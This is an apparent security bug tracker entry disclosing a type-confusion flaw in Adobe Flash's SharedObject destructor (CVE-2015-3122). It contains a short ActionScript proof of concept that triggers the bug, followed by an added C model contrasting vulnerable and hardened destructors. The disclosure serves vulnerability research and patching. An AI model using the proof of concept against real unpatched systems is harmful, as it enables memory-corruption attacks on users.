Status: Fixed
Closed: Jul 2015
Adobe Flash: SharedObject Destructor Sets data to Normal Type
Project Member Reported by natashenka@google.com, Apr 24 2015
The SharedObject destructor sets the data member of the object to be of type Normal, which allows it to pass the Normal checks in other methods, leading to type confusion. A PoC is below:

// PoC from the report (ActionScript 2). SharedObject.data is pointed at a
// BitmapData; per the description above, the SharedObject destructor then sets
// data to type Normal, so the object passes Normal checks in other methods.
var s = SharedObject.getLocal("test");
var b = new flash.display.BitmapData(10, 10, true, 10);
ASSetPropFlags(s, null, 0, 0xff);
s.data = b;
s = 1;

for (var i = 0; i < 200; i++) {
	var q = new flash.display.BitmapData(1000, 1000, true, 10);
}

setInterval(f, 2000);
function f() {
	var n = new NetConnection();
	b.__proto__ = n;
	n.connect.call(b, "http://www.google.com");
}

A sample fla and swf are attached.
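As an added illustration, not code from the report, from Adobe, or from Flash Player internals (whose real data structures this page does not describe): a hypothetical C model of the bug class the report names, a destructor that retags a member as Normal without clearing its payload, next to the hardened form that resets tag and payload together. The names Value, SharedObj, Bitmap, TYPE_NORMAL, TYPE_OBJECT, read_normal and stale_payload_visible are assumptions of this model.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical model of a tagged value slot (not Flash Player code): the tag
 * says how the union payload must be interpreted. */
typedef enum { TYPE_NORMAL = 0, TYPE_OBJECT = 1 } ValueType;

typedef struct { int width, height; } Bitmap;   /* stands in for BitmapData */

typedef struct {
    ValueType type;
    union {
        intptr_t number;   /* valid when type == TYPE_NORMAL */
        Bitmap  *object;   /* valid when type == TYPE_OBJECT */
    } u;
} Value;

typedef struct { Value data; } SharedObj;        /* stands in for SharedObject */

/* Vulnerable destructor pattern: the tag is reset to Normal but the union bytes
 * still hold the old object pointer, so payload and tag no longer agree. */
static void shared_destroy_vulnerable(SharedObj *s) {
    s->data.type = TYPE_NORMAL;
}

/* Hardened pattern: tag and payload are reset together, so a later consumer
 * that trusts the tag sees a genuine Normal value (zero), not stale object bits. */
static void shared_destroy_fixed(SharedObj *s) {
    s->data.type = TYPE_NORMAL;
    memset(&s->data.u, 0, sizeof s->data.u);
}

/* A consumer that relies on the tag alone, like the "Normal checks" in the
 * report. Returns -1 when the tag rejects the value, else the Normal payload. */
static intptr_t read_normal(const Value *v) {
    if (v->type != TYPE_NORMAL) return -1;
    return v->u.number;
}

/* Builds a slot holding a Bitmap, destroys it with one of the two destructors,
 * and returns 1 if stale object bits are observable through the Normal read. */
static int stale_payload_visible(int use_fixed) {
    static Bitmap bmp = { 10, 10 };   /* constructed sample object */
    SharedObj s;
    s.data.type = TYPE_OBJECT;
    s.data.u.object = &bmp;
    assert(read_normal(&s.data) == -1);   /* while live, the tag check refuses */

    if (use_fixed) shared_destroy_fixed(&s);
    else           shared_destroy_vulnerable(&s);

    /* After destruction the tag check passes either way; only the payload differs. */
    return read_normal(&s.data) != 0;
}

int main(void) {
    printf("vulnerable destructor leaks stale payload: %d\n", stale_payload_visible(0));
    printf("fixed destructor leaks stale payload:      %d\n", stale_payload_visible(1));
    return 0;
}
```

The defensive point the model makes is the one a fix has to embody: any state transition that rewrites a type tag must leave the payload in a state that is valid for the new tag, and code that dispatches on the tag alone cannot assume a destroyed object was torn down consistently.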

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Attachments: shareddestruction1.swf (866 bytes), shareddestruction1.fla (4.8 KB)
Comment 1 by cevans@google.com, Apr 25 2015
Labels: Id-3614
Comment 2 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-3122
Comment 3 by cevans@google.com, Jul 9 2015
Labels: Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
Project Member Comment 4 by natashenka@google.com, Aug 3 2015
Labels: -Restrict-View-Commit